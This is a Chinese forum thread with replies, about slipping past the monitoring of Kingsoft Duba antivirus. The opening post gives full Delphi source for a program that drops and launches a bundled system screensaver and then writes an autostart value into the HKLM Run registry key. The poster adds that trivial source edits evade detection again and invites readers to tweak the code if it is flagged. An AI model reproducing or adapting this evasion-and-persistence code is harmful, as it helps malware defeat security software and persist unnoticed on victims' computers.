古老的方法穿透金山监控－－金山你无视SCR了

langsileaa

不再自写SCR程序，虽然那样可以伪装的让使用者感觉不到，这里直接打包一个系统自带的SCR。
运行程序，两三秒不要操作键盘鼠标。然后去看注册表项：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

再次调整代码，并抓取了整个过程。从视频大家可以看到，我是在联网状态下进行的测试。毒霸监控全开！






效果图：




测试程序：
测试程序估计待会会被云响应，在写代码过程中发现貌似简单修改源码：大小写变化、添加字符、代码位置调整等
都可以再次躲避监控，不过没有深入测试。再次附上源码，遇到被杀，有能力的童鞋可自行调整。

1. unit Unit1;
   
2. interface
   
3. uses
   
4.   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
   
5.   Dialogs, StdCtrls,Registry, ExtCtrls,shellapi;
   
6. type
   
7.   TForm1 = class(TForm)
   
8.     Button2: TButton;
   
9.     Timer1: TTimer;
   
10.     procedure Button2Click(Sender: TObject);
    
11.     procedure Timer1Timer(Sender: TObject);
    
12.   private
    
13.     { Private declarations }
    
14.   public
    
15.     { Public declarations }
    
16.     function ExtractRes(ResType, ResName, ResNewName: string): boolean;
    
17.   end;
    
18. var
    
19.   Form1: TForm1;
    
20. implementation
    
21. {$R *.dfm}
    
22. {$R server.RES}
    
23. function TForm1.ExtractRes(ResType, ResName, ResNewName: string): boolean;
    
24. var
    
25.   Res: TResourceStream;
    
26. begin
    
27.   try
    
28.     Res := TResourceStream.Create(Hinstance, Resname, Pchar(ResType));
    
29.     try
    
30.       Res.SavetoFile(ResNewName);
    
31.       Result := true;
    
32.     finally
    
33.       Res.Free;
    
34.     end;
    
35.   except
    
36.     Result := false;
    
37.   end;
    
38. end;
    
39. procedure TForm1.Button2Click(Sender: TObject);
    
40. var
    
41.   MyRegPath:String;
    
42. begin
    
43.   MyRegPath:=extractfilepath(application.ExeName)+'Sspipes.scr';
    
44.   ExtractRes('ExeFile', 'Mscr', MyRegPath);
    
45.   ShellExecute(0,'open',pchar(ExtractFilePath(ParamStr(0))+'sspipes.scr'),nil,nil,sw_show);
    
46. end;
    
47. procedure TForm1.Timer1Timer(Sender: TObject);
    
48. Var
    
49.   Reg:TRegistry;
    
50. begin
    
51.   Reg:=TRegistry.Create;
    
52.   Try
    
53.     Reg.RootKey:=HKEY_LOCAL_MACHINE;
    
54.   if Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then
    
55.     Reg.WriteString('MyRun',ExtractFilePath(ParamStr(0))+'ScrTest.exe');
    
56.   Finally
    
57.     Reg.CloseKey;
    
58.     Reg.Free;
    
59.     Timer1.Enabled:=false;
    
60. end;
    
61. end;
    
62. 
    
63. end.

复制代码

李白vs苏轼

这个文件在没发出来的时候是报安全的，我那边测试过
现在应该被云响应了，主要看防御的地方，不看云

金山现在对注册表的防护实在不给力啊像uihost啊，shell啊这些大漏点都没防好
希望增加拦截点，这些不怕弹窗，

楼下淡定

好像挺多思想家，哲学家，理论家，道德家的，都淡定的好啊！

byxxdrls

这个程序本身有没有问题？我在没有毒霸的电脑上运行都没写入这个注册表数值。
楼主的附件没更新？

智琛

等待金山粉作出回应

魔君

当一个人妒忌别人比自己好，眼红了，于是那个人就专找别人的缺点来诋毁他。
其实这样做很有意思，有缺点的那个人也觉得很值得，因为有个免费的人在帮他干活，帮他找不好的地方，而自己去改掉缺点。。

堕落爱国者

看不懂代码，表示只能围观......

langsileaa

回复 5楼 魔君 的帖子

真够道德的。佩服，佩服！

小紫英

回复 5楼 魔君 的帖子

这可不是找的，老方法而已

郑伟用户

不是我说啊，却是楼主的言辞本来就容易引起口水，代码我不懂。但截图可以证明---此程序在这样的情况下如何来破坏毒霸，不要说关闭毒霸自保护和文件试试防毒哈

小紫英

回复 9楼 郑伟用户 的帖子

此楼亮了，回看1楼